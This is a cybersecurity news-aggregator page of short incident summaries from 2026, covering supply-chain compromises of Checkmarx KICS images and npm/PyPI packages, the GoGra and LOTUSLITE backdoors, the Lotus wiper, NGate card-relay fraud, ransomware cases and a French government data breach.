All news in category “Incidents and Data Breaches”

⚠️ Cybersecurity researchers warn that unknown actors pushed malicious images to the official checkmarx/kics Docker Hub repository, overwriting tags and introducing a non-official release. Socket's analysis shows the bundled KICS binary was modified to collect, encrypt, and exfiltrate uncensored scan reports to an external endpoint, posing a high risk for IaC scans that may include credentials. Related Checkmarx Microsoft Visual Studio Code extensions (versions 1.17.0 and 1.19.0) were also found to contain code that downloads and runs a remote addon via the Bun runtime using a hardcoded GitHub URL without integrity checks. Organizations that used the affected images or extensions should assume exposed secrets are compromised and treat the event as a broader supply chain compromise.

🔐 Researchers warn of a self-propagating supply-chain worm that infected multiple npm packages to harvest developer credentials and reuse stolen npm tokens to publish poisoned releases. Tracked as CanisterSprawl by Socket and StepSecurity, the campaign uses malicious postinstall hooks and exfiltrates data to both an HTTPS webhook and an ICP canister. The malware also includes PyPI propagation via a .pth payload that runs on interpreter start; JFrog reported compromised xinference Python packages with a Base64 second-stage collector. Recommended mitigations include restricting token scope, rotating and revoking exposed tokens, avoiding unsafe CI triggers like pull_request_target, and monitoring package publishes and postinstall behavior.

🔒 Symantec and Carbon Black attribute a new Linux build of the GoGra backdoor to the threat actor known as Harvester, observing deployments likely targeting entities in South Asia. The implant abuses Microsoft Graph and Outlook mailboxes as a covert C2 channel and is delivered via ELF binaries disguised as PDF lures. Incoming tasking emails (subject prefix "Input") contain Base64-encoded shell commands that the backdoor decrypts and runs via /bin/bash, then exfiltrates results as emails labeled "Output" and removes the original messages.

🚨 Spanish police dismantled what they say was the largest Spanish-language manga piracy platform, active since 2014 and attracting millions of monthly users worldwide. Authorities allege the site offered free, unauthorized access to copyrighted manga and generated over $4,700,000 in advertising revenue through aggressive pop-up ads. Many of those ads were pornographic and appeared on nearly every user action, raising child-safety and reputational concerns. Four people were arrested, investigators seized more than $470,000 in cold cryptocurrency wallets and disrupted a secondary site under development.

📧 Cybersecurity firm Cyberproof has identified a surge of “silent subject” phishing attacks in Q1 2026 that deliberately omit email subjects to evade filters and trigger recipient curiosity. These campaigns target executives and high-value accounts, delivering links, QR codes and attachments that often redirect to spoofed sites or mobile interactions. Attackers rotate domains, use shortened URLs and deploy legitimate tools like Datto RMM to persist. Organizations are advised to enforce MFA, inspect full sender addresses and deploy advanced content-aware email defenses.

🚨 Researchers have uncovered a self-propagating npm supply-chain attack that steals developer credentials and attempts to republish infected packages from compromised accounts. Socket and StepSecurity observed malicious versions in at least 16 Namastex Labs packages, including AI tooling and database modules. The payload harvests tokens, API keys, SSH keys, cloud and CI/CD credentials, browser-stored wallets, and attempts to use npm and PyPI publish tokens to inject itself into packages and spread.

💳 Cybercriminals have trojanized an Android NFC-relay application to capture contactless payment data and PINs, enabling cloning of cards and remote ATM cash-outs. ESET researchers report a new NGate malware variant was injected into the HandyPay app and distributed via a fake lottery site and a spoofed Google Play page targeting Android users in Brazil since November 2025. Traces in the injected code, including emoji markers in debug logs, led researchers to suspect use of generative AI, and ESET has published indicators and a MITRE ATT&CK mapping to aid detection.

🕵️‍♂️ ICE has publicly acknowledged using spyware developed by the Israeli firm Graphite, confirming prior reporting and prompting renewed scrutiny over government surveillance practices. The agency says the tools are used in immigration and criminal investigations but provided limited details about scope, oversight, or legal justification. Privacy advocates and technologists warn that deployment of such remote access trojans can expose large amounts of personal data and evade standard protections.

🔒Angelo Martino, a 41-year-old former ransomware negotiator, has pleaded guilty to conspiring with the BlackCat (ALPHV) ransomware group after secretly supplying negotiation and insurance details from clients to the gang. While working for incident response firm Digital Mint, he passed policy limits and internal positions to maximize extortion profits and was paid for the information. He also admitted collaborating with associates to deploy ransomware between April and November 2023, and authorities have seized about $10m in assets; he faces up to 20 years and will be sentenced on July 9.

⚠️ Kaspersky has identified a previously undocumented file wiper named Lotus Wiper that was used in destructive attacks against Venezuela's energy and utilities sector in late 2025 and early 2026. The campaign relies on two coordinated batch scripts that weaken defenses, probe NETLOGON shares and legacy services, and prepare the environment to deploy a wiper that erases recovery mechanisms, overwrites drives and deletes files. The artifact contains no extortion demands, indicating a targeted, non-financially motivated destructive operation likely planned well in advance.

🔐 Symantec researchers describe a new Linux variant of the GoGra backdoor that abuses Microsoft Graph API and Outlook mailboxes for stealthy command-and-control. The malware uses hardcoded Azure AD credentials to obtain OAuth2 tokens and polls a mailbox folder named "Zomato Pizza" for base64-encoded, AES-CBC-encrypted commands. A Go-based dropper hides an i386 ELF payload as a PDF and establishes persistence via systemd and an XDG autostart entry mimicking the Conky monitor. Processed commands are encrypted and returned by reply email with the subject "Output," and the original command email is removed to limit forensic visibility.

🛡️ Acronis researchers have identified a new variant of LOTUSLITE, attributed with medium confidence to the Chinese-linked Mustang Panda, being distributed via a banking-themed lure focused on India. The backdoor uses a dynamic DNS HTTPS C2 and supports remote shell access, file operations, and session management, indicating espionage-focused intent rather than financial theft. The campaign begins with a Compiled HTML (CHM) file that embeds a legitimate executable with a rogue DLL and triggers JavaScript fetched from cosmosmusic[.]com to perform DLL side-loading. The implanted DLL, dnx.onecore.dll, communicates with editor.gleeze[.]com, and similar artifacts were found targeting South Korean and U.S. policy and diplomatic communities.

🛡️ France's government agency ANTS confirmed a data breach after a threat actor claimed to have stolen citizen records in an intrusion last week. The agency says exposed fields may include login IDs, full names, email addresses, dates of birth, unique account identifiers and, for some individuals, postal addresses, places of birth and phone numbers. ANTS has notified CNIL, the Paris prosecutor and involved ANSSI, is informing affected users and warns the data could be used for phishing and social engineering.

🔴 Kaspersky researchers analyzed a previously undocumented data-wiping malware, dubbed Lotus, uploaded from a Venezuelan host in mid-December and used in targeted attacks against energy and utility organizations in Venezuela. Before detonation the attacker runs two batch scripts that weaken defenses, change account passwords, log off users, disable network interfaces and run destructive tools like diskpart, robocopy and fsutil to overwrite and fill drives. The Lotus binary then performs low-level IOCTL operations, clears USN journals, deletes restore points and overwrites physical sectors to render systems unrecoverable. Administrators are advised to monitor these precursor activities and maintain offline, validated backups.

🔍Check Point researchers found a SystemBC C2 server linked to an affiliate of the The Gentlemen RaaS operation controlling a botnet of more than 1,570 compromised corporate hosts worldwide. SystemBC establishes SOCKS5 tunnels and communicates with its C2 using a custom RC4‑encrypted protocol, enabling payload download or in‑memory execution. The activity aligns with The Gentlemen’s multi‑platform double‑extortion campaigns that abuse GPOs, exposed services, and compromised credentials to escalate access and deploy ransomware.

📱 ESET has identified a new NGate variant that uses a trojanized version of the legitimate HandyPay NFC relay app to harvest payment card data and PINs. Distributed since November 2025 and focused on Brazil, the malicious app relays tapped NFC data to attacker-controlled devices to facilitate contactless fraud and ATM withdrawals. It requires minimal permissions by leveraging its role as the default payment application, helping it evade detection.

🔒 Tyler Robert Buchanan, a 24-year-old British national and senior member of the cybercrime group Scattered Spider, has pleaded guilty to wire fraud conspiracy and aggravated identity theft for his role in 2022 SMS-phishing attacks. He admitted launching tens of thousands of phishing texts that enabled intrusions at companies including Twilio, LastPass, DoorDash and Mailchimp. Prosecutors say the campaign fueled SIM-swap thefts that siphoned at least $8 million in cryptocurrency from U.S. investors. Buchanan faces a statutory maximum of 22 years; sentencing is set for August 21, 2026.

🔒 Angelo Martino, a former ransomware negotiator, pleaded guilty to conspiring with the BlackCat ransomware group to extort U.S. companies in 2023. From April through November 2023, he provided confidential negotiation details — including victims' insurance limits and internal bargaining positions — to maximize ransom demands in exchange for payment. Martino admitted collaborating with incident responders Ryan Goldberg and Kevin Martin while working at DigitalMint and Sygnia, and authorities say the defendants extorted at least $1.2 million in a single case. Investigators seized roughly $10 million in assets; Martino faces up to 20 years and is scheduled for sentencing on July 9, 2026.

🔐 Check Point researchers report that The Gentlemen, a ransomware-as-a-service operation first identified in mid-2025, has claimed over 320 victims with the majority of attacks occurring in early 2026. Affiliates are supplied with cross-platform ransomware written in Go for Windows, Linux, NAS and BSD, plus a C-based ESXi encryptor. The toolkit enables automated lateral movement, Group Policy deployment and credential reuse to achieve rapid, domain-wide encryption, and incidents frequently show defense evasion and post-exploitation tools such as SystemBC and Cobalt Strike.

🔒 ESET researchers uncovered a NGate Android campaign that trojanized the HandyPay NFC relay app to steal contactless card data and capture PINs for fraudulent ATM withdrawals. The poisoned app, spread via fake Rio de Prêmios sites and a deceptive Play Store listing, asks to be set as the default payment app and prompts users to enter their card PIN before tapping their card. Artifacts including emoji-laden debug messages suggest parts of the injected code may have been generated or modified with a large language model.